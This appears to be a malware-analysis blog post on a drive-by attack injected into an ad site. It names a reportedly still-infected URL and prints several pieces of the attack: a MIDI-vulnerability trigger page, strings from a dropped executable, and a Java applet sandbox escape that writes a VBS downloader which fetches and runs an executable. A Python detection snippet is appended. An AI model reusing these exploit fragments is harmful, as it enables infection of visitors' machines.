
Malicious script injected inside http://ad.nsonmedia.com !

Infected site : http://ad.tiad.co.kr/mt2.html
* The site above is still infected as of this writing!



Main site : http://ad.tiad.co.kr/mt2.htm0


Down.html MID vulnerability script !

<html>
<body>
<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
<param name="fileName" value="test_case.mid">
<param name="SendPlayStateChangeEvents" value="true">
<param NAME="AutoStart" value="True">
<param name="uiMode" value="mini">
<param name="Volume" value="-300">
</object>
</body>
</html>

What stood out most in 004.exe was the string Fucknaver.com !

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)  http://fucknaver/    > nul   /c  del    \cmd.exe    }   -   wuapi.exe   stubpath    %SystemRoot%\system32\wuapi.exe onents  ve Setup\Installed Comp \Microsoft\Acti Software    " /f        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\     reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\    \wuapi.exe  Version SOFTWARE\Microsoft\Ole  .exe    http://www.naver.com/    -start start   http://japanddrk/   wininet.dll ADVAPI32.dll    RegSetValueExA  RegCloseKey RegQueryValueExA    InternetOpenA   InternetOpenUrlA    InternetCloseHandle HttpQueryInfoA  RegOpenKeyExA   RegDeleteKeyA   RegCreateKeyA   kernel32.dll    WinExec 

Applet.jar

It contains the files .project, ScriptEngineExp.class, .classpath and MANIFEST.MF !

And inside ScriptEngineExp.class !

 ScriptEngineExp.java javax/script/ScriptEngineManagerjs A Bdata C Djava/lang/StringBuilder Pvar error = new Error("My error");this.toString = function(){ java.lang.System.setSecurityManager(null);java.lang.Runtime.getRuntime().exec('cmd.exe /c echo URL = LCase(WScript.Arguments(0))>"%temp%\\happy.vbs"&&cmd.exe /c echo dim m,s>>"%temp%\\happy.vbs"&&cmd.exe /c echo m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P">>"%temp%\\happy.vbs"&&cmd.exe /c echo s="A=D=O=DB=.=S=t=r=e=a=m">>"%temp%\\happy.vbs"&&cmd.exe /c echo set cmd =Createobject(replace(m,"^","")) >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Open "GET",URL,0 >>"%temp%\\happy.vbs"&&cmd.exe /c echo cmd.Send()>>"%temp%\\happy.vbs"&&cmd.exe /c echo FileName=LCase(WScript.Arguments(1))>>"%temp%\\happy.vbs"&&cmd.exe /c echo Set CsCriptGet = Createobject(replace(s,"=",""))>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Mode=^3>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Type=^1>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Open()>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.Write(cmd.responseBody)>>"%temp%\\happy.vbs"&&cmd.exe /c echo CsCriptGet.SaveToFile FileName,^2>>"%temp%\\happy.vbs"&&cmd.exe /c cscript "%temp%\\happy.vbs"  E F+ "%temp%\\temp.exe"&& "%temp%\\temp.exe"');return "exploit!";};error.message = this; G H I J Kjavax/swing/JListjava/lang/Objecterror L K M N Ojavax/script/ScriptException P ScriptEngineExpjava/applet/AppletgetEngineByName/(Ljava/lang/String;)
Ljavax/script/ScriptEngine;getParameter&(Ljava/lang/String;)Ljava/lang/String;append-(Ljava/lang/String;)Ljava/lang/StringBuilder;toString()
Ljava/lang/String;javax/script/ScriptEngineeval&(Ljava/lang/String;)Ljava/lang/Object;get([Ljava/lang/Object;)Vadd*(Ljava/awt/Component;)Ljava/awt/Component;printStackTrace
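As an added detection example (my own code, not part of the original post), the following Python flags the hidden, auto-starting Windows Media Player object that loads a .mid file, as in the Down.html snippet above, and checks a strings dump of a class file for the sandbox-escape markers seen in ScriptEngineExp.class; the marker list and the sample inputs are my own construction.

```python
from html.parser import HTMLParser

# CLSID of the Windows Media Player ActiveX control used by the Down.html page above
WMP_CLSID = "22D6F312-B0F6-11D0-94AB-0080C74C7E95"

class _ObjectScanner(HTMLParser):
    """Collect each <object>'s CLSID and the <param> values nested under it."""
    def __init__(self):
        super().__init__()
        self.objects = []  # list of (clsid, {param_name: value})
        self._current = None
    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").upper().replace("CLSID:", "")
            self._current = (clsid, {})
            self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current[1][a.get("name", "").lower()] = a.get("value", "")

def find_wmp_mid_objects(html):
    """Return file names of WMP objects that auto-play a .mid file (the Down.html pattern)."""
    p = _ObjectScanner()
    p.feed(html)
    hits = []
    for clsid, params in p.objects:
        if clsid != WMP_CLSID:
            continue
        name = params.get("filename", "")
        if name.lower().endswith(".mid") and params.get("autostart", "").lower() == "true":
            hits.append(name)
    return hits

# Markers (my own choice) of the applet sandbox escape seen in ScriptEngineExp.class
APPLET_MARKERS = ["javax/script/ScriptEngineManager",
                  "setSecurityManager(null)",
                  "Runtime.getRuntime().exec("]

def applet_markers_present(strings_dump):
    """Return the markers found in a strings dump of a class or jar file."""
    return [m for m in APPLET_MARKERS if m in strings_dump]

# Constructed sample: the object element from Down.html above, plus a benign control
SAMPLE_HTML = """<object ID="audio" WIDTH=1 HEIGHT=1 CLASSID="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95">
<param name="fileName" value="test_case.mid"><param NAME="AutoStart" value="True"></object>
<object classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95"><param name="fileName" value="song.mp3"></object>"""
SAMPLE_STRINGS = "javax/script/ScriptEngineManagerjs ... java.lang.System.setSecurityManager(null);java.lang.Runtime.getRuntime().exec('cmd.exe ...')"

if __name__ == "__main__":
    print(find_wmp_mid_objects(SAMPLE_HTML), applet_markers_present(SAMPLE_STRINGS))
```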